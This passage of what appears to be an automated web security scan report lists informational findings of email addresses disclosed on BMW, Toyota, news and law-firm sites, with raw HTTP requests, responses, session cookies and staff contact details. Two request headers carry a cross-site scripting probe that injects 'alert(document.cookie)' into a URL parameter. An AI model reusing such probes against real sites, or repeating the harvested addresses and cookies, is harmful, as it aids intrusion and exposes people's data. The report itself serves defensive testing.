17.10. https://www.bmwusa.com/JavaScript/jQuery/plugins/jquery.hoverIntent.minified.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.bmwusa.com
Path:	/JavaScript/jQuery/plugins/jquery.hoverIntent.minified.js

Issue detail

The following email address was disclosed in the response:

brian@cherne.net

Request

GET /JavaScript/jQuery/plugins/jquery.hoverIntent.minified.js HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; WK9733P=JhuYOfcghHTiCqgKmpjCnVgApuKM86S2aIJ5l1grGrWiHX+M3QHtrjm/1B331Jqh; ASP.NET_SessionId=nt0wfon42yzcy5iixeimo055; NSC_CNX_21529_64.29.204.16=4f52b42b3661; mbox=PC#1295637745501-300919.17#1296864682|check#true#1295655142|session#1295655081531-668160#1295656942

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Location: http://www.bmwusa.com/JavaScript/jQuery/plugins/jquery.hoverIntent.minified.js
Content-Type: application/x-javascript
ETag: "982f96e670abcb1:0"
Last-Modified: Mon, 03 Jan 2011 18:06:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Sat, 22 Jan 2011 00:10:44 GMT
Connection: keep-alive
Content-Length: 1609

.../**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @par
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

17.11. https://www.bmwusa.com/JavaScript/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.bmwusa.com
Path:	/JavaScript/s_code.js

Issue detail

The following email address was disclosed in the response:

id@Ls.tc

Request

GET /JavaScript/s_code.js HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; WK9733P=JhuYOfcghHTiCqgKmpjCnVgApuKM86S2aIJ5l1grGrWiHX+M3QHtrjm/1B331Jqh; ASP.NET_SessionId=nt0wfon42yzcy5iixeimo055; NSC_CNX_21529_64.29.204.16=4f52b42b3661; mbox=PC#1295637745501-300919.17#1296864682|check#true#1295655142|session#1295655081531-668160#1295656942

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Location: http://www.bmwusa.com/JavaScript/s_code.js
Content-Type: application/x-javascript
ETag: "3c36fbe570abcb1:0"
Last-Modified: Mon, 03 Jan 2011 18:06:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Sat, 22 Jan 2011 00:10:49 GMT
Connection: keep-alive
Content-Length: 44197

.../* SiteCatalyst code version: H.17.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************
D
...[SNIP]...
av()+q+(qs?qs:s."
+ "rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+ "lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^
...[SNIP]...

17.12. http://www.businessweek.com/news/2011-01-20/merrill-lynch-jm-said-to-be-hired-for-power-finance-share-sale.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.businessweek.com
Path:	/news/2011-01-20/merrill-lynch-jm-said-to-be-hired-for-power-finance-share-sale.html

Issue detail

The following email addresses were disclosed in the response:

lagerkranser@bloomberg.net
rdavid9@bloomberg.net

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5
Content-Language: en
X-Powered-By: Servlet/2.4 JSP/2.0
benv: nybweb04
bvh: www.businessweek.com
Content-Type: text/html; charset=UTF-8
Date: Fri, 21 Jan 2011 18:30:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta conten
...[SNIP]...
<p>To contact the reporter on this story: Ruth David in Mumbai at rdavid9@bloomberg.net</p>
<p>To contact the editor responsible for this story: Philip Lagerkranser at lagerkranser@bloomberg.net</p>
...[SNIP]...

17.13. http://www.directstartv.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.directstartv.com
Path:	/

Issue detail

The following email address was disclosed in the response:

comments@DirectStarTV.com

Request

GET / HTTP/1.1
Host: www.directstartv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:40:28 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: PHPSESSID=hj0vosufv45apdqnbbc9nqnia2; path=/; domain=.directstartv.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: DTV_ISC=0; expires=Fri, 20-Jan-2012 18:40:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: Referrer=ds-nat-dtop-dent-ehome-none-directstartvcom-1462b; path=/; domain=.directstartv.com
Set-Cookie: Keyword=deleted; expires=Thu, 21-Jan-2010 18:40:27 GMT; path=/; domain=.directstartv.com
Set-Cookie: EngineID=deleted; expires=Thu, 21-Jan-2010 18:40:27 GMT; path=/; domain=.directstartv.com
Set-Cookie: VisitorID=148176080; expires=Sat, 21-Jan-2012 18:40:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: Visits=1; expires=Sat, 21-Jan-2012 18:40:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: VisitID=160462422; expires=Sat, 21-Jan-2012 18:40:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: lpd=default; expires=Tue, 22-Mar-2011 18:40:28 GMT; path=/; domain=.directstartv.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<meta http-equiv="reply-to" content="comments@DirectStarTV.com" />
...[SNIP]...

17.14. http://www.huffingtonpost.com/2011/01/05/david-koch-tea-party-republicans_n_804997.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/2011/01/05/david-koch-tea-party-republicans_n_804997.html

Issue detail

The following email address was disclosed in the response:

huffpolitics@huffingtonpost.com

Request

Response

17.15. http://www.huffingtonpost.com/2011/01/12/sarah-palin-arizona-shooting-statement_n_807833.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/2011/01/12/sarah-palin-arizona-shooting-statement_n_807833.html

Issue detail

The following email address was disclosed in the response:

huffpolitics@huffingtonpost.com

Request

Response

17.16. http://www.intelliprice.com/intellipricedealer/start.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.intelliprice.com
Path:	/intellipricedealer/start.htm

Issue detail

The following email address was disclosed in the response:

info@intelliprice.com

Request

GET /intellipricedealer/start.htm HTTP/1.1
Host: www.intelliprice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 4105
Content-Type: text/html
Last-Modified: Wed, 15 Dec 2010 13:54:06 GMT
Accept-Ranges: bytes
ETag: "cc5bfd895f9ccb1:64a"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:52:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<TITLE>Used car valu
...[SNIP]...
<META NAME="email" CONTENT="info@intelliprice.com">
...[SNIP]...

17.17. http://www.lawcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lawcrossing.com
Path:	/

Issue detail

The following email address was disclosed in the response:

contact@lawcrossing.com

Request

Response

17.18. http://www.legalauthority.com/signup.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.legalauthority.com
Path:	/signup.php

Issue detail

The following email address was disclosed in the response:

example@domainname.com

Request

GET /signup.php HTTP/1.1
Host: www.legalauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:19 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=6g5f9o9lenr88jd1ft2nnmijv6; path=/
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: PHPSESSID=6g5f9o9lenr88jd1ft2nnmijv6; path=/; domain=.legalauthority.com
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 56091


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Legal Recruiter, Law Student Job, Legal Employers, Legal Search Firm, Attorney Jobs . Legal Authority</title
...[SNIP]...
<br style="line-height:3px;">
                                                           (example@domainname.com)
                                                           <br>
...[SNIP]...

17.19. http://www.msnbc.msn.com/id/41161439/ns/politics-more_politics/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/41161439/ns/politics-more_politics/

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/41161439/ns/politics-more_politics/ HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.20. http://www.opensource.org/licenses/gpl-license.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.opensource.org
Path:	/licenses/gpl-license.php

Issue detail

The following email addresses were disclosed in the response:

osi@opensource.org
webmaster@opensource.org

Request

GET /licenses/gpl-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.21. http://www.opensource.org/licenses/mit-license.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.opensource.org
Path:	/licenses/mit-license.php

Issue detail

The following email addresses were disclosed in the response:

osi@opensource.org
webmaster@opensource.org

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.22. http://www.politico.com/blogs/onmedia/1210/Assanges_memoir_advance_tops_1_million.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.politico.com
Path:	/blogs/onmedia/1210/Assanges_memoir_advance_tops_1_million.html

Issue detail

The following email address was disclosed in the response:

khagey@politico.com

Request

Response

17.23. http://www.toyota.com/js/global/global.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.toyota.com
Path:	/js/global/global.js

Issue detail

The following email address was disclosed in the response:

id@8s.tc

Request

GET /js/global/global.js HTTP/1.1
Host: www.toyota.com
Proxy-Connection: keep-alive
Referer: http://www.toyota.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 30 Dec 2010 16:19:15 GMT
ETag: "79f8d-2dc6f-bfc06c0"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 21 Jan 2011 19:21:55 GMT
Connection: close
Content-Length: 187503

/**
* Toyota.com global library include file. This file includes compressed versions of the following standard libraries:
*
* Prototype 1.6.1
* Script.aculo.us 1.8.3
* SWFObject 1.5
* SWFAddres
...[SNIP]...
`D$F)#K=#W($L,(vt$4t`cvt)`Ys.hav()+q+(qs?qs:s.rq(^7)),0,id,ta);qs`h;`Rm('t')`5s.p_r)s.p_r(`I`d`h}^J(qs);^T`v($E;`k$E`e^3,`H$X1',vb`I@Q=^H=s.`Q`s=s.`Q^4=`G`o`h`5s.pg)`G^z@Q=`G^zeo=`G^z`Q`s=`G^z`Q^4`h`5!id@8s.tc@3tc=1;s.flush`V()}`3#K`Ctl`0o,t,n,vo`2;s.@Q=$Po`I`Q^4=t;s.`Q`s=n;s.t($E}`5pg){`G^zco`0o){`N^t\"_\",1,$I`3$Po)`Cwd^zgs`0u$6`N^tun,1,$I`3s.t()`Cwd^zdc`0u$6`N^tun,$I`3s.t()}}@El=(`G`M`m`9`4'@Ss@20`Id=^C;
...[SNIP]...

17.24. http://www.toyotafinancial.com/consumer/framework/skins/tfs/js/calendar.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.toyotafinancial.com
Path:	/consumer/framework/skins/tfs/js/calendar.js

Issue detail

The following email addresses were disclosed in the response:

support@softcomplex.com
tnguyen@edocs.com

Request

GET /consumer/framework/skins/tfs/js/calendar.js HTTP/1.1
Host: www.toyotafinancial.com
Proxy-Connection: keep-alive
Referer: http://www.toyotafinancial.com/consumer/tfs.portal?_nfpb=true&_pageLabel=pg_ForwardEstimator6c74b%22%3balert(document.cookie)//3b7137a4f55
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ofsc=6bvzN5JHhqXFWZdG3kh6Qnv0Bj8Zw8FCQ3vWn3j6pNn4mFsBLfLD!2083777476!658673615

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:47:15 GMT
Content-length: 54050
Last-Modified: Tue, 17 Jun 2008 08:34:26 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript

// Title: Tigra Calendar PRO
// Description: Tigra Calendar PRO is flexible JavaScript Calendar offering
// high reliability and wide browsers support.
// URL: http://www.softcomplex.com/products/tigra_calendar_pro/
// Version: 4.2
// Date: 05-24-2002 (mm-dd-yyyy)
// Technical Support: support@softcomplex.com (specify product title and order ID)
// Notes: This Script is shareware. Please visit url above for registration details.

// MODIFICATIONS
// Date modified: 06-13-2002
// Author: Tai Nguyen, tnguyen@edocs.com
// Notes: Moved some object references into a separate calendar method "cal_finish".
// Form field can now be placed after the constructor method but before the
// cal_finish() method. Removed
...[SNIP]...

// Added routine to cal_validate() to disable dates on the 29, 30, and 31st if
// reoccur_payment flag is set to true in the HTML file.
//
// Date modified: 06-25-2002
// Author: Tai Nguyen, tnguyen@edocs.com
// Notes: Changed cal_get_html() to not show past years in drop-down.
// Changed cal_get_body() to set today's date to class="calDayToday".
// Changed cal_finish() to update the current date to be within the
// date range if minimum or maximum date is specified.
//
// Date modified: 06-28-2002
// Author: Tai Nguyen, tnguyen@edocs.com
// Notes: Changed calendar() to create a this.min_valid_date property which
// is used to update the date when date is not valid.
//
// Date modified: 07-05-2002
// Author: Tai Nguyen, tnguyen@edocs.com
// Notes: Added a payment date parameter to constructor - sets selected date to
// payment date if specified. Also updated cal_finish() to set date form field
// to current date on initiali
...[SNIP]...

17.25. http://www.toyotafinancial.com/consumer/framework/skins/tfs/js/prototype.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.toyotafinancial.com
Path:	/consumer/framework/skins/tfs/js/prototype.js

Issue detail

The following email address was disclosed in the response:

sam@conio.net

Request

GET /consumer/framework/skins/tfs/js/prototype.js HTTP/1.1
Host: www.toyotafinancial.com
Proxy-Connection: keep-alive
Referer: http://www.toyotafinancial.com/consumer/tfs.portal?_nfpb=true&_pageLabel=pg_ForwardEstimator6c74b%22%3balert(document.cookie)//3b7137a4f55
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ofsc=6bvzN5JHhqXFWZdG3kh6Qnv0Bj8Zw8FCQ3vWn3j6pNn4mFsBLfLD!2083777476!658673615

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:47:17 GMT
Content-length: 55149
Last-Modified: Tue, 30 Jan 2007 10:35:00 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript

/* Prototype JavaScript framework, version 1.5.0_rc0
* (c) 2005 Sam Stephenson <sam@conio.net>
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see
...[SNIP]...

17.26. http://www.usatoday.com/money/world/2011-01-20-chinabuilding20_ST_N.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.usatoday.com
Path:	/money/world/2011-01-20-chinabuilding20_ST_N.htm

Issue detail

The following email addresses were disclosed in the response:

accuracy@usatoday.com
letters@usatoday.com

Request

GET /money/world/2011-01-20-chinabuilding20_ST_N.htm HTTP/1.1
Host: www.usatoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.27. http://www.velaw.com/WorkArea/java/ektron.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.velaw.com
Path:	/WorkArea/java/ektron.js

Issue detail

The following email address was disclosed in the response:

jquery-en@googlegroups.com

Request

GET /WorkArea/java/ektron.js HTTP/1.1
Host: www.velaw.com
Proxy-Connection: keep-alive
Referer: http://www.velaw.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.velaw.com&SiteLanguage=1033; EktGUID=bf5fdf70-b7e5-4354-a7e6-1e156b18231d; EkAnalytics=newuser; ASP.NET_SessionId=obqhqxaluhyuqcmur1ytfz45

Response

HTTP/1.1 200 OK
Content-Length: 172238
Content-Type: application/x-javascript
Last-Modified: Wed, 25 Nov 2009 13:17:30 GMT
Accept-Ranges: bytes
ETag: "0d1f7a3d16dca1:30a"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 18:25:00 GMT

if ("undefined" == typeof $ektron)
{
/*
Ektron JavaScript Library
Copyright (c) 2008 Ektron, Inc.
All rights reserved

Instructions to upgrade this Ektron Li
...[SNIP]...
(Ektron.RegExp.rtrim,""); },

// method to work around bugs in jquery' offset() when element is nested inside relative/absolute elements
// from: http://www.mail-archive.com/jquery-en@googlegroups.com/msg72499.html
positionedOffset: function(elem) {
var offsetParent = elem.offsetParent(), offset = elem.offset(), position = elem.position();
if ( !/^body|html$/i.tes
...[SNIP]...

17.28. http://www.velaw.com/lawyers/DavidBlumental.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.velaw.com
Path:	/lawyers/DavidBlumental.aspx

Issue detail

The following email address was disclosed in the response:

dblumental@velaw.com

Request

GET /lawyers/DavidBlumental.aspx HTTP/1.1
Host: www.velaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.velaw.com&SiteLanguage=1033; EktGUID=bf5fdf70-b7e5-4354-a7e6-1e156b18231d; EkAnalytics=newuser; ASP.NET_SessionId=obqhqxaluhyuqcmur1ytfz45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 21 Jan 2011 18:35:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 63929

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" >
<head><scrip
...[SNIP]...
<a href="#" onclick="makeWinNB('../lawyers/getCCWindow.aspx?n=David+M.+Blumental&t=Partner&p=+86.21.6196.8091&c=&f=+86.21.6196.8099&e=dblumental@velaw.com&addr=3%2fF%2c+The+Center%26lt%3bbr+%2f%26gt%3b989+Chang+Le%c2%a0Road%26lt%3bbr+%2f%26gt%3bShanghai+200031+China&bioID=768&SubHeadName=Mergers%2c+Acquisitions+and+Dispositions');">
...[SNIP]...
<a href="#" onclick="makeWinNB('../lawyers/getCCWindow.aspx?n=David+M.+Blumental&t=Partner&p=+86.21.6196.8091&c=&f=+86.21.6196.8099&e=dblumental@velaw.com&addr=3%2fF%2c+The+Center%26lt%3bbr+%2f%26gt%3b989+Chang+Le%c2%a0Road%26lt%3bbr+%2f%26gt%3bShanghai+200031+China&bioID=768&SubHeadName=Oil+and+Gas');">
...[SNIP]...
<a href="#" onclick="makeWinNB('../lawyers/getCCWindow.aspx?n=David+M.+Blumental&t=Partner&p=+86.21.6196.8091&c=&f=+86.21.6196.8099&e=dblumental@velaw.com&addr=3%2fF%2c+The+Center%26lt%3bbr+%2f%26gt%3b989+Chang+Le%c2%a0Road%26lt%3bbr+%2f%26gt%3bShanghai+200031+China&bioID=768&SubHeadName=Power');">
...[SNIP]...
<a href="#" onclick="makeWinNB('../lawyers/getCCWindow.aspx?n=David+M.+Blumental&t=Partner&p=+86.21.6196.8091&c=&f=+86.21.6196.8099&e=dblumental@velaw.com&addr=3%2fF%2c+The+Center%26lt%3bbr+%2f%26gt%3b989+Chang+Le%c2%a0Road%26lt%3bbr+%2f%26gt%3bShanghai+200031+China&bioID=768&SubHeadName=Private+Equity%2fFinance');">
...[SNIP]...
<a href="#" onclick="makeWinNB('../lawyers/getCCWindow.aspx?n=David+M.+Blumental&t=Partner&p=+86.21.6196.8091&c=&f=+86.21.6196.8099&e=dblumental@velaw.com&addr=3%2fF%2c+The+Center%26lt%3bbr+%2f%26gt%3b989+Chang+Le%c2%a0Road%26lt%3bbr+%2f%26gt%3bShanghai+200031+China&bioID=768&SubHeadName=Corporate%2fCommercial');">
...[SNIP]...
<a href="#" onclick="makeWinNB('../lawyers/getNBWindow.aspx?n=David+M.+Blumental&t=Partner&p=+86.21.6196.8091&c=&f=+86.21.6196.8099&e=dblumental@velaw.com&addr=3%2fF%2c+The+Center%26lt%3bbr+%2f%26gt%3b989+Chang+Le%c2%a0Road%26lt%3bbr+%2f%26gt%3bShanghai+200031+China&bioID=768&SubHeadName=Professional Recognition');">
...[SNIP]...
<a href="#" onclick="makeWinNB('../lawyers/getNBWindow.aspx?n=David+M.+Blumental&t=Partner&p=+86.21.6196.8091&c=&f=+86.21.6196.8099&e=dblumental@velaw.com&addr=3%2fF%2c+The+Center%26lt%3bbr+%2f%26gt%3b989+Chang+Le%c2%a0Road%26lt%3bbr+%2f%26gt%3bShanghai+200031+China&bioID=768&SubHeadName=Publications and Presentations');">
...[SNIP]...
<a title='Get a vCard' href="../includes/vcard.aspx?atty_email=dblumental@velaw.com&atty_name=David M. Blumental&atty_lname=Blumental&atty_fname=David&atty_mname=M.&atty_level=2&atty_phone=+86.21.6196.8091&atty_cell=&atty_fax=+86.21.6196.8099&atty_phone2=+86.10.6410.6393&atty_fax2=+8
...[SNIP]...
<a class='RightColumn' href='#' onclick="makeWin('../includes/email.aspx?atty_email= dblumental@velaw.com&atty_name=David M. Blumental')">dblumental@velaw.com</a>
...[SNIP]...

17.29. http://www.velaw.com/lawyers/DavidDAlessandro.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.velaw.com
Path:	/lawyers/DavidDAlessandro.aspx

Issue detail

The following email address was disclosed in the response:

ddalessandro@velaw.com

Request

GET /lawyers/DavidDAlessandro.aspx HTTP/1.1
Host: www.velaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.velaw.com&SiteLanguage=1033; EktGUID=bf5fdf70-b7e5-4354-a7e6-1e156b18231d; EkAnalytics=newuser; ASP.NET_SessionId=obqhqxaluhyuqcmur1ytfz45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 21 Jan 2011 18:35:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46795

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" >
<head><scrip
...[SNIP]...
<a href="#" onclick="makeWinNB('../lawyers/getNBWindow.aspx?n=David+C.+D%2527Alessandro&t=Partner&p=+1.214.220.7890&c=&f=+1.214.999.7890&e=ddalessandro@velaw.com&addr=Trammell+Crow+Center%26lt%3bbr+%2f%26gt%3b2001+Ross+Avenue%26lt%3bbr+%2f%26gt%3bSuite+3700%26lt%3bbr+%2f%26gt%3bDallas%2c+TX+75201-2975&bioID=1630&SubHeadName=Professional Recognition');">
...[SNIP]...
<a title='Get a vCard' href="../includes/vcard.aspx?atty_email=ddalessandro@velaw.com&atty_name=David C. D'Alessandro&atty_lname=D'Alessandro&atty_fname=David&atty_mname=C.&atty_level=2&atty_phone=+1.214.220.7890&atty_cell=&atty_fax=+1.214.999.7890&atty_phone2=&atty_fax2=&officeid=226&
...[SNIP]...
<a class='RightColumn' href='#' onclick="makeWin('../includes/email.aspx?atty_email= ddalessandro@velaw.com&atty_name=David C. D%27Alessandro')">ddalessandro@velaw.com</a>
...[SNIP]...

17.30. http://www.velaw.com/lawyers/JaneVris.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.velaw.com
Path:	/lawyers/JaneVris.aspx

Issue detail

The following email address was disclosed in the response:

jvris@velaw.com

Request

GET /lawyers/JaneVris.aspx HTTP/1.1
Host: www.velaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
